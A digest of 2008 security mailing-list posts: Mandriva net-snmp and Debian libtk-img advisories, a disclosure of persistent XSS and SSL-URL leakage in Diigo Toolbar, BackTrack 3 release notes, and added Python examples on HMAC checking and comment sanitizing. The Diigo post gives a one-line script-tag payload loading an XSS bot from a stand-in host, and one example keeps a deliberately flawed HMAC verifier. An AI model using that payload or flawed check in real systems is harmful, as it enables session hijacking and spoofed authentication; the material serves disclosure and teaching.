
From: security@mandriva.com
Date: Fri, 20 Jun 2008 22:23:00 +0100

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDVSA-2008:118
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : net-snmp
 Date    : June 19, 2008
 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________
 
 Problem Description:
 
 A vulnerability was found in how Net-SNMP checked an SNMPv3 packet's
 Keyed-Hash Message Authentication Code (HMAC).  An attacker
 could exploit this flaw to spoof an authenticated SNMPv3 packet
 (CVE-2008-0960).
 
 A buffer overflow was found in the perl bindings for Net-SNMP that
 could be exploited if an attacker could convince an application
 using the Net-SNMP perl modules to connect to a malicious SNMP agent
 (CVE-2008-2292).
 
 The updated packages have been patched to prevent these issues.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2292
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.1:
 8db66ef5a5468d3fd72a47855230a28e  2007.1/i586/libnet-snmp10-5.3.1-3.2mdv2007.1.i586.rpm
 c951b17138ef11828b2ccf031d4cddaf  2007.1/i586/libnet-snmp10-devel-5.3.1-3.2mdv2007.1.i586.rpm
 536a87919f32fac81964d0a907bf08fe  2007.1/i586/libnet-snmp10-static-devel-5.3.1-3.2mdv2007.1.i586.rpm
 39e33947c21666dac5dbe5cfe103b26d  2007.1/i586/net-snmp-5.3.1-3.2mdv2007.1.i586.rpm
 1eed5ebaff8f6f83befbf8d831900073  2007.1/i586/net-snmp-mibs-5.3.1-3.2mdv2007.1.i586.rpm
 874db03c69584025e4d91049072d3c4e  2007.1/i586/net-snmp-trapd-5.3.1-3.2mdv2007.1.i586.rpm
 11af93c879d8cd9353b7cb1826900222  2007.1/i586/net-snmp-utils-5.3.1-3.2mdv2007.1.i586.rpm
 2c9e819eeb5fd472f6a0fe338d86182b  2007.1/i586/perl-NetSNMP-5.3.1-3.2mdv2007.1.i586.rpm 
 7a0806202ff8f3d838fa7958b636a449  2007.1/SRPMS/net-snmp-5.3.1-3.2mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 aa27de502ce22110fd745c0b847b79d9  2007.1/x86_64/lib64net-snmp10-5.3.1-3.2mdv2007.1.x86_64.rpm
 1843dd154c443cca9ae977e502221d6d  2007.1/x86_64/lib64net-snmp10-devel-5.3.1-3.2mdv2007.1.x86_64.rpm
 838bd7820d446bd947bc46e090b38066  2007.1/x86_64/lib64net-snmp10-static-devel-5.3.1-3.2mdv2007.1.x86_64.rpm
 e659d3df04816330c7bf45008f66bc27  2007.1/x86_64/net-snmp-5.3.1-3.2mdv2007.1.x86_64.rpm
 756d5606a1039d20a7512b0a109d53bb  2007.1/x86_64/net-snmp-mibs-5.3.1-3.2mdv2007.1.x86_64.rpm
 8ad36943e07362865f3a48c99914e48c  2007.1/x86_64/net-snmp-trapd-5.3.1-3.2mdv2007.1.x86_64.rpm
 483140c06017507127d12357c3ed2b41  2007.1/x86_64/net-snmp-utils-5.3.1-3.2mdv2007.1.x86_64.rpm
 e2bb901815ffa1ca5b0a16bc1363f84f  2007.1/x86_64/perl-NetSNMP-5.3.1-3.2mdv2007.1.x86_64.rpm 
 7a0806202ff8f3d838fa7958b636a449  2007.1/SRPMS/net-snmp-5.3.1-3.2mdv2007.1.src.rpm

 Mandriva Linux 2008.0:
 8de3c4975620db2b2c2697d6f9deb79b  2008.0/i586/libnet-snmp15-5.4.1-1.1mdv2008.0.i586.rpm
 b1991c58d996f4be200fe141e28c5f7d  2008.0/i586/libnet-snmp-devel-5.4.1-1.1mdv2008.0.i586.rpm
 03c54182cc7f97633f29ff0251a8c898  2008.0/i586/libnet-snmp-static-devel-5.4.1-1.1mdv2008.0.i586.rpm
 1f792de19b7b38b56d68242958d5d800  2008.0/i586/net-snmp-5.4.1-1.1mdv2008.0.i586.rpm
 e3362a641e232a6ecf0b8230f0e49ec8  2008.0/i586/net-snmp-mibs-5.4.1-1.1mdv2008.0.i586.rpm
 bc6d8c10135ea64a4d512d80d04b1b39  2008.0/i586/net-snmp-trapd-5.4.1-1.1mdv2008.0.i586.rpm
 8e7f28ee85fb48129eea57d11d391c8b  2008.0/i586/net-snmp-utils-5.4.1-1.1mdv2008.0.i586.rpm
 beab129e378f61a6bf62d366a4d90639  2008.0/i586/perl-NetSNMP-5.4.1-1.1mdv2008.0.i586.rpm 
 3fce488df784163f19e6a55061d773ca  2008.0/SRPMS/net-snmp-5.4.1-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 82b570c9cb7e0662df4d7da730c131db  2008.0/x86_64/lib64net-snmp15-5.4.1-1.1mdv2008.0.x86_64.rpm
 20b8a6e3fc8dd82fe5ecfdb337553938  2008.0/x86_64/lib64net-snmp-devel-5.4.1-1.1mdv2008.0.x86_64.rpm
 555688caa0eee850b3a5f835a5778849  2008.0/x86_64/lib64net-snmp-static-devel-5.4.1-1.1mdv2008.0.x86_64.rpm
 60d65f80aec29dcb6d4ceb4bb117a9bc  2008.0/x86_64/net-snmp-5.4.1-1.1mdv2008.0.x86_64.rpm
 685c9dd25b585afc128de1b3c092e5d5  2008.0/x86_64/net-snmp-mibs-5.4.1-1.1mdv2008.0.x86_64.rpm
 7bff860904572c092f737ac17940d5b2  2008.0/x86_64/net-snmp-trapd-5.4.1-1.1mdv2008.0.x86_64.rpm
 e434686bddfb04f2a8bd01346517ecb4  2008.0/x86_64/net-snmp-utils-5.4.1-1.1mdv2008.0.x86_64.rpm
 4fab6e498e1f05809db500ce895aad66  2008.0/x86_64/perl-NetSNMP-5.4.1-1.1mdv2008.0.x86_64.rpm 
 3fce488df784163f19e6a55061d773ca  2008.0/SRPMS/net-snmp-5.4.1-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 4bafceae1a29f6557b5aa884eca24ba0  2008.1/i586/libnet-snmp15-5.4.1-5.1mdv2008.1.i586.rpm
 1eedbae5df7e503de1cba736129beaa1  2008.1/i586/libnet-snmp-devel-5.4.1-5.1mdv2008.1.i586.rpm
 615a88847cbf1ce6eaf0029037a14b1b  2008.1/i586/libnet-snmp-static-devel-5.4.1-5.1mdv2008.1.i586.rpm
 7323cb7d35eb67664d40ad73b413679d  2008.1/i586/net-snmp-5.4.1-5.1mdv2008.1.i586.rpm
 d43ed96a806639a94af2a137c75e276e  2008.1/i586/net-snmp-mibs-5.4.1-5.1mdv2008.1.i586.rpm
 7394b1361b43056b5eb99827771358cf  2008.1/i586/net-snmp-tkmib-5.4.1-5.1mdv2008.1.i586.rpm
 8d6fd9308c2edbe8c020d2c33b3a841d  2008.1/i586/net-snmp-trapd-5.4.1-5.1mdv2008.1.i586.rpm
 dc58047a02e1a222af20aa794ea8f447  2008.1/i586/net-snmp-utils-5.4.1-5.1mdv2008.1.i586.rpm
 2ad9888cd61fc4952c1cee0c48f714b5  2008.1/i586/perl-NetSNMP-5.4.1-5.1mdv2008.1.i586.rpm 
 7a19c1f8d42052af6392b18b48bd965c  2008.1/SRPMS/net-snmp-5.4.1-5.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 618c241e0ecb57685646264c9bb083b4  2008.1/x86_64/lib64net-snmp15-5.4.1-5.1mdv2008.1.x86_64.rpm
 bb0ebf49ee7cca29965aeb398f4725f6  2008.1/x86_64/lib64net-snmp-devel-5.4.1-5.1mdv2008.1.x86_64.rpm
 b4f29f00773291f6cc00784ed7cde470  2008.1/x86_64/lib64net-snmp-static-devel-5.4.1-5.1mdv2008.1.x86_64.rpm
 3039811b6682dc4009b32ff48a99eb2b  2008.1/x86_64/net-snmp-5.4.1-5.1mdv2008.1.x86_64.rpm
 fab09178635501eb5d6a82eb7bd532a3  2008.1/x86_64/net-snmp-mibs-5.4.1-5.1mdv2008.1.x86_64.rpm
 da29d4c7edaa15d95f8bee98dbfab025  2008.1/x86_64/net-snmp-tkmib-5.4.1-5.1mdv2008.1.x86_64.rpm
 d9aad834d82d310c64f6f21e17a55920  2008.1/x86_64/net-snmp-trapd-5.4.1-5.1mdv2008.1.x86_64.rpm
 7a7c871bd87dc91c16b046ac115cda70  2008.1/x86_64/net-snmp-utils-5.4.1-5.1mdv2008.1.x86_64.rpm
 d102ea2af0fcaaebd98defda72bcfc91  2008.1/x86_64/perl-NetSNMP-5.4.1-5.1mdv2008.1.x86_64.rpm 
 7a19c1f8d42052af6392b18b48bd965c  2008.1/SRPMS/net-snmp-5.4.1-5.1mdv2008.1.src.rpm

 Corporate 3.0:
 335af3930865c8eb44ef436cad5fb373  corporate/3.0/i586/libnet-snmp5-5.1-7.4.C30mdk.i586.rpm
 b8e1d307ee6fa3905d292077fc063318  corporate/3.0/i586/libnet-snmp5-devel-5.1-7.4.C30mdk.i586.rpm
 a668cc4de411865567d1a93f34cee1e3  corporate/3.0/i586/libnet-snmp5-static-devel-5.1-7.4.C30mdk.i586.rpm
 d8c0d342b03e5719443d2de06c631bd5  corporate/3.0/i586/libsnmp0-4.2.3-8.2.C30mdk.i586.rpm
 6bbe3bb2502ce3c974f7b5737331bb4d  corporate/3.0/i586/libsnmp0-devel-4.2.3-8.2.C30mdk.i586.rpm
 daca10f2e578f75c1e7415d78ed30265  corporate/3.0/i586/net-snmp-5.1-7.4.C30mdk.i586.rpm
 1630ebd75201e1bc3956b12a26282f92  corporate/3.0/i586/net-snmp-mibs-5.1-7.4.C30mdk.i586.rpm
 5a4f483c877a6278088a265cb3273d61  corporate/3.0/i586/net-snmp-trapd-5.1-7.4.C30mdk.i586.rpm
 316d866de7fa7cd984d58f5cb742f5e3  corporate/3.0/i586/net-snmp-utils-5.1-7.4.C30mdk.i586.rpm
 e3d4197517565f12e2c3a8fd1cc5d2e7  corporate/3.0/i586/ucd-snmp-4.2.3-8.2.C30mdk.i586.rpm
 17e8d856fd1dac18552818a842105c88  corporate/3.0/i586/ucd-snmp-utils-4.2.3-8.2.C30mdk.i586.rpm 
 ccaa4d311ad0e5d119e17b1f1876c7e2  corporate/3.0/SRPMS/net-snmp-5.1-7.4.C30mdk.src.rpm
 53e16d2069cffb7e7d1e7a324192d5c2  corporate/3.0/SRPMS/ucd-snmp-4.2.3-8.2.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 b31f277942fca76d953007c94a60cae2  corporate/3.0/x86_64/lib64net-snmp5-5.1-7.4.C30mdk.x86_64.rpm
 e4a3fba10ccdd805dc8783ae68c99a42  corporate/3.0/x86_64/lib64net-snmp5-devel-5.1-7.4.C30mdk.x86_64.rpm
 530a94cc87af0e4d6e9f3815473c0dd4  corporate/3.0/x86_64/lib64net-snmp5-static-devel-5.1-7.4.C30mdk.x86_64.rpm
 f246ca421b5d16c599d53f70e4b97660  corporate/3.0/x86_64/lib64snmp0-4.2.3-8.2.C30mdk.x86_64.rpm
 b943e07726a2fecb016ef4ba626906d8  corporate/3.0/x86_64/lib64snmp0-devel-4.2.3-8.2.C30mdk.x86_64.rpm
 22822876f72e35cf6d1ed027df93e74a  corporate/3.0/x86_64/net-snmp-5.1-7.4.C30mdk.x86_64.rpm
 e7e51782b9bbd1e1bdf93c17fb953280  corporate/3.0/x86_64/net-snmp-mibs-5.1-7.4.C30mdk.x86_64.rpm
 e67a9105f9492c020693d48ce55652ea  corporate/3.0/x86_64/net-snmp-trapd-5.1-7.4.C30mdk.x86_64.rpm
 171a17e507b2dfdb9c70c0089e582221  corporate/3.0/x86_64/net-snmp-utils-5.1-7.4.C30mdk.x86_64.rpm
 96886146d21175b076e92d59e96f5016  corporate/3.0/x86_64/ucd-snmp-4.2.3-8.2.C30mdk.x86_64.rpm
 1b6ee4c253f15be516a1928a4f791f15  corporate/3.0/x86_64/ucd-snmp-utils-4.2.3-8.2.C30mdk.x86_64.rpm 
 ccaa4d311ad0e5d119e17b1f1876c7e2  corporate/3.0/SRPMS/net-snmp-5.1-7.4.C30mdk.src.rpm
 53e16d2069cffb7e7d1e7a324192d5c2  corporate/3.0/SRPMS/ucd-snmp-4.2.3-8.2.C30mdk.src.rpm

 Corporate 4.0:
 6cbe9d76db3b05c2435bcbc5cf16c898  corporate/4.0/i586/libnet-snmp5-5.2.1.2-5.2.20060mlcs4.i586.rpm
 586a55cfde45020d5ea0ebf5f2d6c840  corporate/4.0/i586/libnet-snmp5-devel-5.2.1.2-5.2.20060mlcs4.i586.rpm
 d992d8300cf0639942a179349d592e15  corporate/4.0/i586/libnet-snmp5-static-devel-5.2.1.2-5.2.20060mlcs4.i586.rpm
 03a49b848c376b705dcfcef0ec817daf  corporate/4.0/i586/net-snmp-5.2.1.2-5.2.20060mlcs4.i586.rpm
 22b9d01b3b7a8a34ed3e1a5a435286a8  corporate/4.0/i586/net-snmp-mibs-5.2.1.2-5.2.20060mlcs4.i586.rpm
 dccc01a94c1f29eac2875e6a935bf589  corporate/4.0/i586/net-snmp-trapd-5.2.1.2-5.2.20060mlcs4.i586.rpm
 77f93230f96abce039b52ca5612eaa36  corporate/4.0/i586/net-snmp-utils-5.2.1.2-5.2.20060mlcs4.i586.rpm
 8a7209b70979c9d73035ff40cbd8dbb4  corporate/4.0/i586/perl-NetSNMP-5.2.1.2-5.2.20060mlcs4.i586.rpm 
 ac919459a8752cddfd441c085ca69117  corporate/4.0/SRPMS/net-snmp-5.2.1.2-5.2.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 f94c7e967973ba8aa12b5605251d6e78  corporate/4.0/x86_64/lib64net-snmp5-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
 f332985986eff2d6c8a75b5c263dedb1  corporate/4.0/x86_64/lib64net-snmp5-devel-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
 82fc454916e75866370ee738292021c8  corporate/4.0/x86_64/lib64net-snmp5-static-devel-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
 ff0adeb23df57eb34869c7100df159da  corporate/4.0/x86_64/net-snmp-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
 72f2dc9cb1695999660a9ff9c97e4c47  corporate/4.0/x86_64/net-snmp-mibs-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
 0f244551c87e051a8274e5050cf0bc2a  corporate/4.0/x86_64/net-snmp-trapd-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
 7c4e7fb304c77c6551a50495d338e84e  corporate/4.0/x86_64/net-snmp-utils-5.2.1.2-5.2.20060mlcs4.x86_64.rpm
 68d81ca4c173710ef43b36092df2a6ee  corporate/4.0/x86_64/perl-NetSNMP-5.2.1.2-5.2.20060mlcs4.x86_64.rpm 
 ac919459a8752cddfd441c085ca69117  corporate/4.0/SRPMS/net-snmp-5.2.1.2-5.2.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 f98286a301d580fe306917cf0169ef88  mnf/2.0/i586/libnet-snmp5-5.1-7.4.M20mdk.i586.rpm 
 3ba27516773b1dd933828207cecc7754  mnf/2.0/SRPMS/net-snmp-5.1-7.4.M20mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFIW/O7mqjQ0CJFipgRAlNDAJwKuG+ljPAS2MDqj4QOlf+2PtWFUQCeIlun
Kcp+qeLAEA/HEE8HXT88NkY=
=D9Hu
-----END PGP SIGNATURE-----
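The first item in the advisory above concerns how an SNMPv3 receiver checks a packet's HMAC. The following is an added example in Python, written for this digest; it is not Net-SNMP code and is not taken from the advisory. It assumes the 12-byte truncated tags of RFC 3414's HMAC-MD5-96 / HMAC-SHA-96 and takes `wire_bytes` to be the message with its authentication field already zeroed, leaving the BER framing out. The widely reported root cause of CVE-2008-0960 was that the receiver compared only as many tag bytes as the packet itself supplied; `verify_weak` keeps that shape as the "before", and `verify_strict` shows the two properties a correct check needs: the receiver, not the sender, fixes the tag length, and the comparison is constant-time.

```python
import hashlib
import hmac

# RFC 3414 HMAC-MD5-96 / HMAC-SHA-96: the tag carried on the wire is the
# first 12 bytes of the full HMAC output.
TAG_LEN = 12


def compute_tag(auth_key, wire_bytes, digestmod=hashlib.sha1):
    """Truncated HMAC over the message (authParameters already zeroed by the caller)."""
    return hmac.new(auth_key, wire_bytes, digestmod).digest()[:TAG_LEN]


def verify_weak(auth_key, wire_bytes, received_tag):
    """Flawed shape of check: the comparison length is taken from the packet.

    A sender who supplies a 1-byte tag only has to match one byte (1 chance in 256),
    and an empty tag matches unconditionally. Kept here only as the 'before'.
    """
    expected = compute_tag(auth_key, wire_bytes)
    return expected[:len(received_tag)] == received_tag


def verify_strict(auth_key, wire_bytes, received_tag):
    """Correct check: fixed tag length decided by the receiver, constant-time compare."""
    if len(received_tag) != TAG_LEN:
        return False
    return hmac.compare_digest(compute_tag(auth_key, wire_bytes), received_tag)


def demo():
    """Constructed key and message; reports what each verifier says about several tags."""
    key = b"constructed-localized-auth-key"          # constructed, not a real key
    msg = b"constructed SNMPv3 message, authParameters zeroed"
    good = compute_tag(key, msg)
    return {
        "full tag, weak": verify_weak(key, msg, good),
        "full tag, strict": verify_strict(key, msg, good),
        "1-byte tag, weak": verify_weak(key, msg, good[:1]),
        "1-byte tag, strict": verify_strict(key, msg, good[:1]),
        "empty tag, weak": verify_weak(key, msg, b""),
        "empty tag, strict": verify_strict(key, msg, b""),
        "tampered message, strict": verify_strict(key, msg + b"!", good),
    }


if __name__ == "__main__":
    for case, accepted in demo().items():
        print("%-26s accepted=%s" % (case, accepted))
```

The length check comes before the HMAC computation on purpose: a receiver that lets the sender choose how much of the tag is compared has, in the worst case, no authentication at all, and no amount of constant-time comparison repairs that.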
From: Ferruh Mavituna
Date: Fri, 20 Jun 2008 20:53:29 +0100
Diigo Toolbar - Global XSS and Information Leakage in SSL URLs

== Global XSS ==
Diigo (http://www.diigo.com/) is a social bookmarking and sharing
application which allows users to see other users' comments and notes
for every website. For this feature users should use the Diigolet
bookmarklet or Diigo Toolbar - http://www.diigo.com/tools. These are
almost mandatory to use Diigo and almost all Diigo members have them
installed.

An attacker can do Cross-site Scripting in these public comments and
that comment will affect any other user of Diigo Toolbar and Diigolet
who visits the website. This means a Diigo user can easily backdoor any
website on the internet with a permanent XSS, and any other Diigo user
who visits this website will be affected. The vulnerability
exists in:
* Diigo Toolbar for IE,
* Diigo Toolbar for FF,
* Diigolet for IE and FF,

These comments will be injected into the current domain context, thus
an attacker can execute JavaScript code in the target domain. The
target URL can be over SSL as well. All Diigo tools users are affected
by this vulnerability.

For an attacker this is a perfect opportunity to use some XSS bot
manager application such as XSS Shell. Also, an attacker can attack
high-profile websites such as online banking applications. Considering
you can search in shared bookmarks, you can actually find people who use
a certain online banking application.

A sample attack comment can be:
<script src="http://example.com/xssshell/"></script>


== Fix ==
Download the latest version of Diigo Toolbar

== Disclosure Timeline ==
* 12 May 2008 - Vendor Informed
* 2 June 2008 - Another e-mail to vendor to check if they've fixed
* 3 June 2008 - Vendor informed me that it's fixed
* 20 June 2008 - Public Release


== Information Leakage in SSL URLs ==
Diigo toolbar is sending all SSL URLs to their servers over HTTP for
the shared comment feature, which might leak session_ids or any other
sensitive information transferred over the URL.


== Fix ==
Users cannot opt out of this feature. There is no known fix; this
looks like it is considered a feature, not a bug.

== Disclosure Timeline ==
* 9 May 2008  - Vendor informed. A couple of mails were exchanged and I
tried to explain why this is bad; it didn't work.
* 12 May 2008 - Asked for an update, no response.
* 20 June 2008 - Public Release

-- 
Ferruh Mavituna
http://ferruh.mavituna.com
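The two issues in the post above share one defensive lesson: shared comments must be reduced to safe markup before any client injects them into a page, and a client must not report the URL of an HTTPS page over a plaintext channel. The following is an added example in Python, not code from Ferruh's post or from Diigo; it sits on the server side of a comment-sharing service, where comments should be sanitized before they are stored or served to any toolbar. `sanitize_comment` rebuilds a comment from an allowlist of tags (`ALLOWED_TAGS`, my choice) and drops everything else, including the content of `<script>`; `url_for_sharing` is one possible client-side policy (mine, not Diigo's) for what may be sent about the current page: nothing for HTTPS pages, and for HTTP pages only scheme, host and path, since query strings and fragments are where session ids usually live.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, urlunsplit

# Markup a shared comment may keep. Everything else is dropped rather than escaped,
# so <script>, <img onerror=...> and similar never reach another user's browser.
ALLOWED_TAGS = {"b", "i", "em", "strong", "a"}
LINK_SCHEMES = {"http", "https"}


class CommentSanitizer(HTMLParser):
    """Rebuilds comment markup from an allowlist (written for this example)."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # sanitized fragments, joined at the end
        self.open_tags = []    # allowed tags we emitted and still need to close
        self.skip_depth = 0    # > 0 while inside <script>/<style>: their text is discarded

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        if tag == "a":
            href = dict(attrs).get("href") or ""
            if urlsplit(href).scheme not in LINK_SCHEMES:
                return  # javascript:, data:, vbscript: and relative links are refused
            self.out.append('<a href="%s" rel="noopener noreferrer">' % escape(href, quote=True))
        else:
            self.out.append("<%s>" % tag)
        self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if tag in self.open_tags:
            # close anything opened after it as well, so the output stays well formed
            while self.open_tags:
                t = self.open_tags.pop()
                self.out.append("</%s>" % t)
                if t == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=True))

    def result(self):
        self.close()
        while self.open_tags:
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_comment(raw):
    """Return markup safe to inject into any page; unknown tags and all scripts vanish."""
    s = CommentSanitizer()
    s.feed(raw)
    return s.result()


def url_for_sharing(page_url):
    """Client-side policy for what may be reported about the current page over HTTP.

    HTTPS pages are never reported at all; HTTP pages lose query string and fragment.
    """
    parts = urlsplit(page_url)
    if parts.scheme != "http":
        return None
    return urlunsplit(("http", parts.netloc, parts.path or "/", "", ""))


if __name__ == "__main__":
    # constructed inputs, the first being the sample attack comment from the post
    print(repr(sanitize_comment('<script src="http://example.com/xssshell/"></script>')))
    print(repr(sanitize_comment('Nice <b>page</b> <a href="javascript:alert(1)">here</a>')))
    print(url_for_sharing("https://bank.example/account?sid=abc"))
    print(url_for_sharing("http://example.com/page?token=1#top"))
```

Dropping rather than escaping unknown markup keeps the output predictable: a comment can only ever contain text and the five listed tags, whatever the toolbar or bookmarklet does with it afterwards.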
From: Max Moser
Date: Fri, 20 Jun 2008 17:12:49 +0100
BackTrack 3 Final - Release Information
Released yesterday exclusively on pauldotcom.com

Muts, Martin and I have slaved for weeks and months, together with the
help of many remote-exploit'ers to bring you this fine release. As
usual, this version overshadows the previous ones with extra cool
things.

SAINT
SAINT has provided BackTrack users with a functional version of SAINT,
pending a free request for an IP range license through the SAINT
website, valid for 1 year.

Maltego
The guys over at Paterva have created a special version of Maltego
v2.0 with a community license especially for BackTrack users. We would
like to thank Paterva for co-operating with us and allowing us to
feature this amazing tool in BackTrack.

Nessus
Tenable would not allow for redistribution of Nessus on BackTrack 3.

Kernel
2.6.21.5. Yes, yes, stop whining....We had serious deliberations
concerning the BT3 kernel. We decided not to upgrade to a newer kernel
as wireless injection patches were not fully tested and verified. We
did not want to jeopardize the awesome wireless capabilities of BT3
for the sake of sexiness or slightly increased hardware
compatibilities. All relevant security patches have been applied.

Tools
As usual, updated, sharpened, SVN'ed and armed to the teeth. This
release we have some special features such as spoonwep, fastrack and
other cool additions.

Availability
For the first time we distribute three different versions of BackTrack 3
       - CD version
       - USB version
       - VMWare version

BackTrack 3 final download page is here:
http://remote-exploit.org/backtrack_download.html


Final Requests
We request the community to not mirror or torrent this release, or
otherwise distribute it online without our knowledge.
We are trying to gather statistics about bt3 downloads. If you would
like to mirror BT3 then please:

1) Think again! Traffic generated by BT3 downloads is CRAZY.
2) Please contact us before doing so.
3) Send us monthly statistics of downloads for the iso.

If you would like to add a link to BackTrack downloads to your
website, please use:

http://www.remote-exploit.org/backtrack_download.html as the download link.


Rants
Problems, fixes, bugs, opinions - should all end up in our Remote
Exploit community forums, and our wiki:

http://forums.remote-exploit.org
http://wiki.remote-exploit.org



Over and out,

Max, Muts, MjM
From: thijs@debian.org (Thijs Kinkhorst)
Date: Thu, 19 Jun 2008 22:12:53 +0100
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1598-1                  security@debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
June 19, 2008                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : libtk-img
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2008-0553

It was discovered that a buffer overflow in the GIF image parsing code
of Tk, a cross-platform graphical toolkit, could lead to denial of
service and potentially the execution of arbitrary code.

For the stable distribution (etch), this problem has been fixed in version
1:1.3-15etch2.

For the unstable distribution (sid), this problem has been fixed in
version 1:1.3-release-7.

We recommend that you upgrade your libtk-img package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2.dsc
    Size/MD5 checksum:      955 899003c10c63f4045b6df8ef32d3fafe
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3.orig.tar.gz
    Size/MD5 checksum:  3918119 ee19a7fdaaa64e9d85eeecd3b78bce8f
  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2.diff.gz
    Size/MD5 checksum:   242795 deb7118d93d3657201e4892c0e62e1d2

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_amd64.deb
    Size/MD5 checksum:   461706 7394a577a99522bdabcf6016dcc05de7

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_arm.deb
    Size/MD5 checksum:   435110 96a6c430a51de8914023256029ebac06

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_hppa.deb
    Size/MD5 checksum:   488468 78173de530e68252090369658db6dab7

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_i386.deb
    Size/MD5 checksum:   431784 902eaac4fba63bccf7be864ff1242aa0

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_ia64.deb
    Size/MD5 checksum:   601570 4c004fd7d945b8f3e4591b5bf27ce0a8

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_mips.deb
    Size/MD5 checksum:   445292 33639ca7ed46125b98e503c2b82e34e8

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_mipsel.deb
    Size/MD5 checksum:   440938 20d279c06711eb509f42d48ac697ba9f

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_powerpc.deb
    Size/MD5 checksum:   452162 8e87166cc45ccbf4c0a38ee36993f472

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_s390.deb
    Size/MD5 checksum:   457402 2857259815207722d226c8fd90e78923

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/libt/libtk-img/libtk-img_1.3-15etch2_sparc.deb
    Size/MD5 checksum:   421954 686340dad232ce09f661569e37387b4d


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBSFrLW2z0hbPcukPfAQIdCQgAhccZto0Df/VeVPJVKbs1n7J8oaYG88A8
JSo+6CpBhrjwRjlb0fr5qQMjHRQqxkGGECvXlb52WLMMfGz7VRqNJG/OnbS1wAgn
f7NH/QSF3hlCAV7TJXPgU1yVihRP8BIfuonHphqtcWlDXLQ+SwqZuSlQ9KE/MzcT
7gK9etNG6H2jAGPTo1M4pcp75ZfWQVR1COEzGHXp9ozIr3lDmRebE94c+49zgXGM
2CWCfUqQG5BPCp2XoKbv1hOf9uji5dxF5Qcc0vuc8J7DexSUwrnJhX6KEXHIUjPU
